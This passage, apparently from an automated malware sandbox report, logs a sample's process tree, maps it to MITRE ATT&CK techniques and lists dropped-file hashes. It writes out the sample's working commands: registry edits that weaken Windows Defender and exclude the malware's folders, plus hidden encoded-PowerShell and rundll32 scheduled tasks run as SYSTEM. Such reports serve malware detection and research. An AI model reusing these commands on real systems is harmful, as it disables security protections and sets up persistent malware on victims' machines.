/f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3812
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:2296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4740
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1792
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gAEFcpygS" /SC once /ST 09:19:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:1440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gAEFcpygS"
  2⤵
  PID:784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "OvvioKEypuBLsTFYZ"
  2⤵
  PID:1780
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 13:48:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\VxHaPwz.exe\" dM /YQsite_idXCs 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4448
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gAEFcpygS"
  2⤵
  PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5504
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:376

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3832

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
1⤵
PID:4552

C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\VxHaPwz.exe
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\VxHaPwz.exe dM /YQsite_idXCs 385118 /S
1⤵
PID:3160
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\PfIgUL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:6124
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:3704
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:6072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"
  2⤵
  PID:3004
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "tCfKGXDvAPRRvLf2" /F /xml "C:\Program Files (x86)\MiKcmJhqU\uvHqkTz.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "tCfKGXDvAPRRvLf"
  2⤵
  PID:5892
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "tCfKGXDvAPRRvLf"
  2⤵
  PID:4584
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yUJcmcRyNwKRa2" /F /xml "C:\ProgramData\UrkGLyjigLRybTVB\jauyRcX.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5936
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iOUfqyxVtpISCFCEp2" /F /xml "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\lUVfxQg.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "WLJiZzmdxByrvR" /F /xml "C:\Program Files (x86)\WQqkELkVHOYU2\RJQeQtb.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "phKAbPCvhOcihqTrHht2" /F /xml "C:\Program Files (x86)\mQvpiNUsNPjLC\vIAcmRY.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "hNXJOWJzZwASvpUks"
  2⤵
  PID:900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "hNXJOWJzZwASvpUks" /SC once /ST 03:30:41 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YYFeagcQEOcPvCau\bfCyEsMG\GOcikTb.dll\",#1 /Ursite_idKEd 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:3680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "OvvioKEypuBLsTFYZ"
  2⤵
  PID:5656
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:4268

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
1⤵
PID:5068

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
1⤵
PID:1476

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\bfCyEsMG\GOcikTb.dll",#1 /Ursite_idKEd 385118
1⤵
PID:2096
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "hNXJOWJzZwASvpUks"
  2⤵
  PID:512

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\bfCyEsMG\GOcikTb.dll",#1 /Ursite_idKEd 385118
1⤵
PID:964

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
1⤵
PID:6124

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
1⤵
PID:5504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
69KB

MD5
856bb5725d02fd1eeb511a8060a7905b

SHA1
784a05f06fcaf0805d7fbe10fdfbde35f54fce12

SHA256
04013347b4dda1bc072d7e000491adfe1dcb13f1ec508c311d6b4c65baf3cda3

SHA512
8a5f5365951b66099f690d244e19c17c96d5154938dd64e017c070965fa5d75bc5b287eb2c5e5a8ee654afbc6c39c2201429ebd075ab362a4cbf67aab381cb8b

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
118KB

MD5
a456fb5dd1e3eb375861361d37e3d9ea

SHA1
16a01fa7ad2a720cbfd9946d43f3e54fe065ff75

SHA256
9f10e541365911a0deaee1a094444b5b3889a330e0ce69f82593dbe1b3dfeef4

SHA512
a05e24724fac8e558582d2c1dc31b719d8f95e92db4519038b183b8fd52809e7e5d8faf7f7d25dd059c69fa3394abc8e53e4a4c8f19e3df5d1455a923fbb926d

Download Submit
C:\ProgramData\mozglue.dll

Filesize
44KB

MD5
ccf2f04abe405bbd9513db3eae97303d

SHA1
7f33d981ec57d57ce56388b0ccd50e6713624cf5

SHA256
d8a1a177a59818ad1309faf37d77baa6baba0119bd3f6140576375cc790b47a5

SHA512
